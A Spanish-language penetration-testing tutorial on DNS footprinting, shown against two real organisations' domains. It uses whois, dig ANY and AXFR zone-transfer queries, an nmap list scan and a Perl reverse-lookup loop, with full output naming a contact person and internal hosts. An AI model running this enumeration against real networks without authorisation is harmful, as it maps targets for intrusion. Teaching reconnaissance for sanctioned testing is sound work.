Ahora debemos buscar todos los dominios y subdominios que podamos encontrar. Podemos buscar tanto en Google como en la base de datos de whois para localizar los dominios así como el servidor de nombres al que esta asociado.

Lo primero que podemos hacer es identificar el responsable del dominio y su servidor de nombres asociado, esto nos sirve para comenzar a identificar segmentos de red, proveedores de servicios externos, redundancia en equipos, etc.

Desde una Terminal de un sistema *NIX podemos ejecutar la siguiente búsqueda:

slax ~ # whois itam.mx

DOMINIO: itam.mx

FECHA DE CREACION: 02-JAN-95
FECHA DE ULTIMA MODIFICACION: 05-JAN-05

ORGANIZACION: ITAM [itam1]
DOMICILIO: Mexico, D.F., Mexico

CONTACTO ADMINISTRATIVO: Uciel Fragoso Rodriguez [uciel]
DOMICILIO: Mexico, D.F., Mexico

CONTACTO TECNICO: Uciel Fragoso Rodriguez [uciel]
DOMICILIO: Mexico, D.F., Mexico

CONTACTO DE PAGO: Uciel Fragoso Rodriguez [uciel]
DOMICILIO: Mexico, D.F., Mexico

SERVIDOR PRIMARIO: turing2.itam.mx
IP PRIMARIO: 148.205.228.11

SERVIDOR SECUNDARIO: remo.itam.mx
IP SECUNDARIO: 148.205.228.17

SERVIDOR SECUNDARIO: name.roc.gblx.net

SERVIDOR SECUNDARIO: name.phx.gblx.net

Con la información obtenida en el ejemplo anterior, podemos apreciar lo siguiente:

• Nombre del contacto.
• Fecha de creación de dominio.
• DNS, de los cuales 2 son administrados por la organización y 2 por externos.

Cuando ya contamos con los servidores DNS de la organización podemos realizar peticiones directas a los mismos. A continuación muestro las diferentes tipos de consultas que podemos realizar:

• SOA (State of authority)- Muestra quien es el servidor DNS primario.
• NS (Name Server) Muestra quienes son los servidores DNS de un dominio.
• MX (Mail Exchanger) Muestra quien se encarga de entregar correo para un dominio.
• ANY (Any Query) Busca cualquier registro contenido en la zona.
• TXT (Text Query) Busca registros de texto.
• AXFR- (Zone transfer) Trae todos los registros almacenados en una zona DNS.
• A (Address). Muestra el registro para traducir nombre de host a direcciones IP.
• CNAME (Canonical Name). Se usa para crear nombres de hosts adicionales, o alias, para los hosts de un dominio.

Existen dos consultas claves que debemos realizar siempre, la ANY y la AXFR. Es importante mencionar que no todos los servidores DNS permiten búsquedas del tipo AXFR ya que es considerada una mala practica, este tipo de búsquedas deben ser restringidas solamente entre un servidor primario y uno secundario. ¿Que herramientas nos permiten realizar estas búsquedas?

• SamSpace
• Dig
• Host
• Nslookup
• Dsnwalk
• Etc.

En este caso utilizaremos dig para realizar las búsquedas.

- La búsqueda any nos permite conocer todos los equipos NS,MX,SOA, A de un dominio:

slax ~ # dig any @148.205.228.11 itam.mx

; <<>> DiG 9.3.1 <<>> any @148.205.228.11 itam.mx
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59063
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 18, AUTHORITY: 0, ADDITIONAL: 7

;; QUESTION SECTION:
;itam.mx. IN ANY

;; ANSWER SECTION:
itam.mx. 600 IN A 148.205.228.219
itam.mx. 3600 IN A 148.205.148.5
itam.mx. 600 IN A 148.205.36.229
itam.mx. 600 IN A 148.205.133.22
itam.mx. 600 IN A 148.205.228.17
itam.mx. 600 IN A 148.205.52.10
itam.mx. 600 IN A 148.205.228.11
itam.mx. 600 IN A 148.205.40.4
itam.mx. 600 IN A 148.205.40.11
itam.mx. 600 IN A 148.205.228.27
itam.mx. 3600 IN NS artemisa2.itam.mx.
itam.mx. 3600 IN NS turing2.itam.mx.
itam.mx. 3600 IN NS remo.itam.mx.
itam.mx. 3600 IN NS name.phx.gblx.net.
itam.mx. 3600 IN NS name.roc.gblx.net.
itam.mx. 3600 IN SOA turing2.itam.mx. uciel.itam.mx. 2002068227 3600 600 1209600 3600
itam.mx. 3600 IN MX 10 stockton.itam.mx.
itam.mx. 3600 IN MX 10 malone.itam.mx.

;; ADDITIONAL SECTION:
artemisa2.itam.mx. 3600 IN A 148.205.40.11
turing2.itam.mx. 3600 IN A 148.205.228.11
remo.itam.mx. 3600 IN A 148.205.228.17
name.phx.gblx.net. 39355 IN A 206.165.6.10
name.roc.gblx.net. 56775 IN A 209.130.187.10
stockton.itam.mx. 3600 IN A 148.205.228.32
malone.itam.mx. 3600 IN A 148.205.228.6

;; Query time: 193 msec
;; SERVER: 148.205.228.11#53(148.205.228.11)
;; WHEN: Mon Aug 7 14:28:11 2006
;; MSG SIZE rcvd: 506

- La búsqueda axfr es un poco diferente a la any ya que no permite hacer un intercambio de Zonas de transferencia. Esto quiere decir que nos enviara toda su zona con la cual podremos tener todos los nombres de los equipos registrados en el dominio.

slax ~ # dig axfr @148.205.228.11 itam.mx

; <<>> DiG 9.3.1 <<>> axfr @148.205.228.11 itam.mx
; (1 server found)
;; global options: printcmd
itam.mx. 3600 IN SOA turing2.itam.mx. uciel.itam.mx. 2002068242 3600 600 1209600 3600
itam.mx. 3600 IN NS artemisa2.itam.mx.
itam.mx. 3600 IN NS turing2.itam.mx.
itam.mx. 3600 IN NS remo.itam.mx.
itam.mx. 3600 IN NS name.phx.gblx.net.
itam.mx. 3600 IN NS name.roc.gblx.net.
itam.mx. 3600 IN MX 10 stockton.itam.mx.
itam.mx. 3600 IN MX 10 malone.itam.mx.
0r3dac14d.itam.mx. 1200 IN A 148.205.197.15
eventos.itam.mx. 3600 IN CNAME ddip.itam.mx.
www.eventos.itam.mx. 3600 IN CNAME ddip.itam.mx.
exalumnos.itam.mx. 3600 IN CNAME ddip.itam.mx.
www.exalumnos.itam.mx. 3600 IN CNAME ddip.itam.mx.
exalumnos_conta.itam.mx. 3600 IN CNAME phobos.itam.mx.
executivemba.itam.mx. 3600 IN CNAME phobos.itam.mx.
www.executivemba.itam.mx. 3600 IN CNAME phobos.itam.mx.
expo-itam.itam.mx. 1200 IN A 148.205.220.21
extension.itam.mx. 3600 IN CNAME titan2.itam.mx.
edit.extension.itam.mx. 3600 IN CNAME titan2.itam.mx.
etc
etc
etc

Los resultados anteriores nos permiten determinar muchas cosas relativas al direccionamiento así como los subdominios de la organización de quien estamos recopilando información.

En el caso del dominio ITAM, se puede determinar que su bloque de red es 148.205.228.X y además la identificación del tipo de nombres que utilizan para sus equipos.

Otra forma es hacer la búsqueda es mediante google:

inurl:itam.mx

La búsqueda anterior nos permite conocer subdominios del itam.mx

Bloques de red

Con la información encontrada anteriormente ya es posible determinar los bloques de red que tiene una organización, y conocer si algunos servicios están hosteados.

Sigamos el rastro del dominio iss.net

slax ~ # whois iss.net

Registrant:
Internet Security Systems, Inc.
6303 Barfield Rd
Atlanta, GA 30328
US

Domain Name: ISS.NET

Administrative Contact, Technical Contact:
Internet Security Systems Inc. iss-dnsadmin@ISS.NET
6303 BARFIELD RD NE
ATLANTA, GA 30328-4233
US
(404) 236-2600 fax: (404) 236-2614

Record expires on 29-Jun-2012.
Record created on 30-Jun-1994.
Database last updated on 10-Aug-2006 12:17:24 EDT.

Domain servers in listed order:

EHECATL.ISS.NET 209.134.161.10
SFLD-NS1.NETREX.COM 207.231.129.132

Con la información anterior podemos determinar que el servidor primario de DNS es administrado por la organización. Ahora realizaremos una búsqueda ANY.

slax ~ # dig any @209.134.161.10 iss.net

; <<>> DiG 9.3.1 <<>> any @209.134.161.10 iss.net
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65516
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 5

;; QUESTION SECTION:
;iss.net. IN ANY

;; ANSWER SECTION:
iss.net. 60 IN SOA ehecatl.iss.net. iss-dnsadmin.is s.net. 2006080802 3600 1800 604800 3600
iss.net. 60 IN NS sfld-ns1.netrex.com.
iss.net. 60 IN NS ehecatl.iss.net.
iss.net. 60 IN MX 10 colo-mx1.iss.net.
iss.net. 60 IN MX 10 sfld-mx1.iss.net.
iss.net. 60 IN MX 5 atla-mx1.iss.net.
iss.net. 60 IN A 209.134.161.35

;; ADDITIONAL SECTION:
ehecatl.iss.net. 60 IN A 209.134.161.10
sfld-ns1.netrex.com. 3600 IN A 207.231.129.132
atla-mx1.iss.net. 60 IN A 209.134.161.6
colo-mx1.iss.net. 60 IN A 12.129.100.18
sfld-mx1.iss.net. 60 IN A 207.231.129.133

;; Query time: 353 msec
;; SERVER: 209.134.161.10#53(209.134.161.10)
;; WHEN: Mon Aug 7 15:55:37 2006
;; MSG SIZE rcvd: 300

De la información de la búsqueda podemos determinar que existen dos bloques diferentes de red que responden a equipos tipo A del dominio principal los cuales son:

• 209.134.161.X
• 207.231.129.X

Cada uno de ellos de diferentes ISP, con lo cual podemos comenzar a realizar un mapa de la arquitectura de Red de la organización.

Lo que se hará a continuación es resolver cada unos de los equipos en los diferentes bloques de red, para de esta manera identificar los equipos de la organización.

¿Qué herramientas pueden ayudarnos a esto?

• Nmap
• Host
• Nslookup
• Etc.

Si deseamos realizar la tarea con nmap, el comando que se sugiere utilizar es el siguiente:

‘nmap -sL -P0 –dns-server DNS Red –R’

>>nmap -sL -P0 –dns-servers 209.134.161.10 209.134.161.1/24

Starting Nmap 4.01 ( http://www.insecure.org/nmap ) at 2006-12-04 16
Failed to resolve given hostname/IP: ûR. Note that you can’t use ‘/
e IP ranges
Host 209.134.161.0 not scanned
Host 209.134.161.1 not scanned
Host atla-ngw5-a-ext.iss.net (209.134.161.2) not scanned
Host atla-ngw5-b-ext.iss.net (209.134.161.3) not scanned
Host 209.134.161.4 not scanned
Host 209.134.161.5 not scanned
Host atla-mx1.iss.net (209.134.161.6) not scanned
Host lists.it-isac.org (209.134.161.7) not scanned

También es posible realizar la resolución de nombres utilizando ‘host’ y ‘perl’:

perl -e ‘for ($x=1;$x<=254;$x++){system “host 209.134.161.$x 209.134.161.10″}’

Using domain server:
Name: 209.134.161.10
Address: 209.134.161.10#53
Aliases:

Host 1.161.134.209.in-addr.arpa not found: 3(NXDOMAIN)
Using domain server:
Name: 209.134.161.10
Address: 209.134.161.10#53
Aliases:

2.161.134.209.in-addr.arpa domain name pointer atla-ngw5-a-ext.iss.net.
Using domain server:
Name: 209.134.161.10
Address: 209.134.161.10#53
Aliases:

3.161.134.209.in-addr.arpa domain name pointer atla-ngw5-b-ext.iss.net.
Using domain server:
Name: 209.134.161.10
Address: 209.134.161.10#53
Aliases:

6.161.134.209.in-addr.arpa domain name pointer atla-mx1.iss.net.
Using domain server:
Name: 209.134.161.10
Address: 209.134.161.10#53
Aliases:

Realizando la misma búsqueda sobre el otro servidor de dominio y el otro segmento de red nos da el siguiente resultado:

perl -e ‘for ($x=1;$x<=254;$x++){system “host 207.231.129.$x 207.231.129.132″}’ | grep iss.net

5.129.231.207.in-addr.arpa domain name pointer sfld-ngw1a.iss.net.
6.129.231.207.in-addr.arpa domain name pointer sfld-ngw1.iss.net.
7.129.231.207.in-addr.arpa domain name pointer sfld-ngw1b.iss.net.
9.129.231.207.in-addr.arpa domain name pointer sfld-mss-fw1.iss.net.
11.129.231.207.in-addr.arpa domain name pointer sfld-mss-fw1.mss.iss.net.
12.129.231.207.in-addr.arpa domain name pointer sfld-mss-fw2.mss.iss.net.
18.129.231.207.in-addr.arpa domain name pointer sfld-perim1.iss.net.
19.129.231.207.in-addr.arpa domain name pointer sfld-perim2.iss.net.
24.129.231.207.in-addr.arpa domain name pointer sfld-raw1.iss.net.
25.129.231.207.in-addr.arpa domain name pointer sfld-raw2.iss.net.
68.129.231.207.in-addr.arpa domain name pointer sfld-netrwww.mss.iss.net.129.231.207.in-addr.arpa.
133.129.231.207.in-addr.arpa domain name pointer sfld-mx1.iss.net.
134.129.231.207.in-addr.arpa domain name pointer sfld-mx2.iss.net.
196.129.231.207.in-addr.arpa domain name pointer soudom001.iss.net.
197.129.231.207.in-addr.arpa domain name pointer soumaiexcp01.iss.net.
198.129.231.207.in-addr.arpa domain name pointer soumaiwebp01.iss.net.
199.129.231.207.in-addr.arpa domain name pointer bkup-sfld01.iss.net.
200.129.231.207.in-addr.arpa domain name pointer soufil002.iss.net.
201.129.231.207.in-addr.arpa domain name pointer souprn001.iss.net.
202.129.231.207.in-addr.arpa domain name pointer soubacnbup01.iss.net.
203.129.231.207.in-addr.arpa domain name pointer sfld-rad2.iss.net.
204.129.231.207.in-addr.arpa domain name pointer sfld-remedy1.mss.iss.net.
205.129.231.207.in-addr.arpa domain name pointer sfld-fax1.iss.net.
211.129.231.207.in-addr.arpa domain name pointer sfld-ccur.iss.net.
212.129.231.207.in-addr.arpa domain name pointer soudom002.iss.net.
213.129.231.207.in-addr.arpa domain name pointer soumaipmfp01.iss.net.

De esta manera podemos identificar los segmentos de red de una organización así como los equipos que cuentan con un registro en el servidor de dominio.

Para aquellas personas a las que no les guste trabajar en línea de comandos, BiDiBlAH de Sensepost es una herramienta que nos permite realizar estas búsquedas de manera automatizada. A continuación se muestran una serie de pantallas utilizando la herramienta mencionada anteriormente.

La información de nombres de dominio y bloques de red brinda a los hackers (o penetrations testers) mucha información para la creación de la arquitectura de red de la organización, además de que constituye el preámbulo para la detección de servicios públicos de la misma.

La siguiente parte del artículo, se enfocara a la detección ser servicios Públicos donde se trataran cosas desde nombres de host hasta escaneos de puertos, así como la obtención de versiones de servicios.